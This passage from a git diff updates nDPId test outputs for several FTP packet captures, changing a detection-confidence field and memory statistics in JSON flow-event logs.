00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} -00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} +00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","packets-captured":51,"packets-processed":51,"total-skipped-flows":0,"total-l4-payload-len":4690,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1383123629412} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 51/51 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872970 bytes -~~ total memory freed........: 5872970 bytes -~~ total allocations/frees...: 118166/118166 +~~ total memory allocated....: 6006604 bytes +~~ total memory freed........: 6006604 bytes +~~ total allocations/frees...: 120928/120928 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 821 chars diff --git a/test/results/ftp.pcap.out b/test/results/ftp.pcap.out index 96c000111..32e7bc5fd 100644 --- a/test/results/ftp.pcap.out +++ b/test/results/ftp.pcap.out @@ -4,20 +4,20 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"} -00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}} +00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","packets-captured":1192,"packets-processed":1192,"total-skipped-flows":0,"total-l4-payload-len":1050844,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1552590243371} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1192/1192 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5912294 bytes -~~ total memory freed........: 5912294 bytes -~~ total allocations/frees...: 119318/119318 +~~ total memory allocated....: 6045940 bytes +~~ total memory freed........: 6045940 bytes +~~ total allocations/frees...: 122080/122080 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 826 chars diff --git a/test/results/ftp_failed.pcap.out b/test/results/ftp_failed.pcap.out index 466d47d57..fc69f88d9 100644 --- a/test/results/ftp_failed.pcap.out +++ b/test/results/ftp_failed.pcap.out @@ -4,8 +4,8 @@ 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="} -00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} +00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":18,"total-skipped-flows":0,"total-l4-payload-len":136,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1574361633102} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 18/18 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872032 bytes -~~ total memory freed........: 5872032 bytes -~~ total allocations/frees...: 118134/118134 +~~ total memory allocated....: 6005674 bytes +~~ total memory freed........: 6005674 bytes +~~ total allocations/frees...: 120896/120896 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 837 chars diff --git a/test/results/fuzz-2006-06-26-2594.pcap.out b/test/results/fuzz-2006-06-26-2594.pcap.out index 5b6bf2b59..e1c4dbea6 100644 --- a/test/results/fuzz-2006-06-26-2594.pcap.out +++ b/test/results/fuzz-2006-06-26-2594.pcap.out @@ -2,70 +2,70 @@ 